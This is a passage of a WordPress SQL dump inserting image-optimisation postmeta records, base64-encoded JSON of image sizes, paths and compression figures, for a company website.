lwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsbGx1YmUtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxsbHViZS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL21pbGxsdWJlLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMTk5LCJpZCI6NDl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxsbHViZS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGxsdWJlLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbWlsbGx1YmUtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEyMDIsImlkIjo0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGxsdWJlLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsbGx1YmUtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9taWxsbHViZS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTIwNCwiaWQiOjQ5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsbGx1YmUtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxsbHViZS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL21pbGxsdWJlLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMjA2LCJpZCI6NDl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxsbHViZS00MDB4MzAxLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGxsdWJlLTQwMHgzMDEuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiIzMDEiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbWlsbGx1YmUtNDAweDMwMS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEyMDgsImlkIjo0OX1d'); 
INSERT INTO `wp_postmeta` VALUES (30407, 48, 'wpfc_optimisation_reduction', '31321'); 
INSERT INTO `wp_postmeta` VALUES (30408, 48, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWV0YWwuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9tZXRhbC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL21ldGFsLmpwZyIsInJlZHVjdGlvbiI6MzEyNDYsInRpbWUiOjE0ODM1OTEyMTUsImlkIjoiNDgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21ldGFsLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWV0YWwtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9tZXRhbC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTIxNywiaWQiOjQ4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21ldGFsLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWV0YWwtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9tZXRhbC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTIxOSwiaWQiOjQ4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21ldGFsLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWV0YWwtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9tZXRhbC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTIyMSwiaWQiOjQ4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWV0YWwtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9tZXRhbC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL21ldGFsLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo3MCwidGltZSI6MTQ4MzU5MTIyMywiaWQiOjQ4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWV0YWwtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9tZXRhbC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL21ldGFsLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMjI1LCJpZCI6NDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9tZXRhbC0yNDd4MjU4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21ldGFsLTI0N3gyNTguanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIyNTgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbWV0YWwtMjQ3eDI1OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEyMjcsImlkIjo0OH1d'); 
INSERT INTO `wp_postmeta` VALUES (30409, 47, 'wpfc_optimisation_reduction', '44575'); 
INSERT INTO `wp_postmeta` VALUES (30410, 47, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWVkaWNhbC0yLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWVkaWNhbC0yLmpwZyIsIndpZHRoIjozMzgsImhlaWdodCI6MzEwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbWVkaWNhbC0yLmpwZyIsInJlZHVjdGlvbiI6NDQ1NDgsInRpbWUiOjE0ODM1OTEyMzQsImlkIjoiNDcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21lZGljYWwtMi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21lZGljYWwtMi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL21lZGljYWwtMi0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTIzNiwiaWQiOjQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21lZGljYWwtMi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21lZGljYWwtMi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL21lZGljYWwtMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTIzOCwiaWQiOjQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21lZGljYWwtMi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21lZGljYWwtMi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL21lZGljYWwtMi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTI0MCwiaWQiOjQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWVkaWNhbC0yLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWVkaWNhbC0yLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbWVkaWNhbC0yLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoyMSwidGltZSI6MTQ4MzU5MTI0MiwiaWQiOjQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWVkaWNhbC0yLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWVkaWNhbC0yLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbWVkaWNhbC0yLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMjQ1LCJpZCI6NDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9tZWRpY2FsLTItMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9tZWRpY2FsLTItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9tZWRpY2FsLTItMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEyNDcsImlkIjo0N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21lZGljYWwtMi0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21lZGljYWwtMi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL21lZGljYWwtMi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTI0OSwiaWQiOjQ3fV0='); 
INSERT INTO `wp_postmeta` VALUES (30411, 46, 'wpfc_optimisation_reduction', '98486'); 
INSERT INTO `wp_postmeta` VALUES (30412, 46, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbHVicmljYW50c19wYWdlLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbHVicmljYW50c19wYWdlLmpwZyIsIndpZHRoIjo0NTAsImhlaWdodCI6MzAxLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbHVicmljYW50c19wYWdlLmpwZyIsInJlZHVjdGlvbiI6OTg0NzcsInRpbWUiOjE0ODM1OTEyNTYsImlkIjoiNDYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2x1YnJpY2FudHNfcGFnZS0zNDB4MzAxLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzAxLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2x1YnJpY2FudHNfcGFnZS0zNDB4MzAxLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2x1YnJpY2FudHNfcGFnZS0zNDB4MzAxLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTI1OSwiaWQiOjQ2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2x1YnJpY2FudHNfcGFnZS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2x1YnJpY2FudHNfcGFnZS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2x1YnJpY2FudHNfcGFnZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTI2MSwiaWQiOjQ2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2x1YnJpY2FudHNfcGFnZS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2x1YnJpY2FudHNfcGFnZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2x1YnJpY2FudHNfcGFnZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTI2MywiaWQiOjQ2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2x1YnJpY2FudHNfcGFnZS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2x1YnJpY2FudHNfcGFnZS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2x1YnJpY2FudHNfcGFnZS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTI2NSwiaWQiOjQ2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbHVicmljYW50c19wYWdlLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbHVicmljYW50c19wYWdlLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbHVicmljYW50c19wYWdlLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMjY3LCJpZCI6NDZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9sdWJyaWNhbnRzX3BhZ2UtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9sdWJyaWNhbnRzX3BhZ2UtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9sdWJyaWNhbnRzX3BhZ2UtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEyNjksImlkIjo0Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2x1YnJpY2FudHNfcGFnZS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2x1YnJpY2FudHNfcGFnZS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2x1YnJpY2FudHNfcGFnZS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTI3MiwiaWQiOjQ2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbHVicmljYW50c19wYWdlLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbHVicmljYW50c19wYWdlLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiL